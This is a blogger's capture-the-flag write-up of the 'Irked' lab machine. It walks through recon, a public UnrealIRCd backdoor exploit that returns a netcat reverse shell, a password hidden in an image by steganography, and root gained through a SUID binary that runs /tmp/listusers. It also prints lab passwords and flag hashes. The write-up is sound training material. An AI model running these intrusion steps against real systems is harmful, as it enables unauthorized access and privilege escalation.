Irked

August 7th, 2020

Irked logo

This is an easy linux box

Tools used

  • cat
  • chmod
  • echo
  • nc
  • nmap
  • python
  • steghide
  • su
  • suid3num
  • wget
  • xchat

Reconnaissance

Nmap

nmap -sC -sV -oA irked 10.10.10.117 -v

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          37161/tcp6  status
|   100024  1          51203/udp   status
|   100024  1          53516/tcp   status
|_  100024  1          56835/udp6  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Here’s what nmap teaches us :

  • port 22 (SSH) - OpenSSH 6.7p1
  • port 80 (HTTP) - Apache 2.4.10
  • port 111 (RPC) - rpcbind 2-4

Running a full scan show me more ports :

nmap -sC -sV -oA irked.full 10.10.10.117 -v -p-
PORT      STATE SERVICE VERSION
6697/tcp  open  irc     UnrealIRCd
8067/tcp  open  irc     UnrealIRCd
53516/tcp open  status  1 (RPC #100024)
65534/tcp open  irc     UnrealIRCd

I found more open port which are about irc. Let’s first see the website :

Website

There is a big image and a string saying “IRC is almost working!”. Let’s connect to the IRC :

xchat --url irc://10.10.10.117:6697/

Irc connected

One connected I see the version installed : Unreal 3.2.8.1, but nothing else interesting. Now that I have the version I’ll check if there is known exploit :

Searchsploit unrealIRC

There is a backdoor command execution, but it’s metasploit. Searching on Google about that, I found this repository : https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor.

Exploit

Download the exploit code :

wget https://raw.githubusercontent.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/master/exploit.py

Start a nc listener :

nc -lvp 1234

Launch the exploit :

python3 exploit.py -payload python 10.10.10.117 6697
Exploit sent successfully!

Then go see the listener :

nc -lvp 1234
listening on [any] 1234 ...
connect to [10.10.14.4] from irked.htb [10.10.10.117] 57920
ircd@irked:~/Unreal3.2$ whoami
whoami
ircd

Nice, I now have a reverse shell as the user ircd ! Looking around for privilege escalation, I found this file :

ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
UPupDOWNdownLRlrBAbaSSss

Since I have done a few CTF, I know when there is steg involve, there must be an image or something. I recall that on the website there was a big image, so I download it :

wget http://10.10.10.117/irked.jpg

Then using this tool (steghide), which is a tool that I often used in CTF, I tried to extract something using the password that I found :

steghide extract -sf irked.jpg 
Enter passphrase: 
wrote extracted data to "pass.txt".

It works and extracted a file called “pass.txt”

cat pass.txt
Kab6h+m+bbp2J:HG

I now have another password. Let’s try it as djmardov :

ircd@irked:/home/djmardov/Documents$ su djmardov
Password: 
djmardov@irked:~/Documents$ whoami
djmardov

Nice, I now have djmardov rights ! Once again let’s try to escalate, this time to root. For that I tried a new script that I found called suid3num, transfert it to the box :

python -m simpleHTTPServer

wget http://10.10.14.4:8000/suid3enum.py

Run it :

djmardov@irked:~/Documents$ suid3num.py
[...]

[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
/usr/bin/procmail                                                                                  
/usr/bin/X                                                                                  
/usr/bin/viewuser                                                           
------------------------------  

[...]

The interesting stuff was what I looked at. And the viewuser binary, I didn’t know it, let’s check it :

djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-08-04 03:12 (:0)
sh: 1: /tmp/listusers: not found

I can run it, that a good sign. It’s looking for a file named listusers in /tmp, so create it :

djmardov@irked:/tmp$ echo "/bin/bash" > listusers
djmardov@irked:/tmp$ chmod 777 listusers

Re-run it :

djmardov@irked:/tmp$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           2020-08-04 03:12 (:0)
root@irked:/tmp# whoami
root

And I’m root ! I can now read flags.

Flags

User.txt

djmardov@irked:~/Documents$ cat user.txt
4a66a78b12dc0e661a59d3f5c0267a8e

Root.txt

root@irked:/tmp# cat /root/root.txt
8d8e9e8be64654b6dccc3bff4522daf3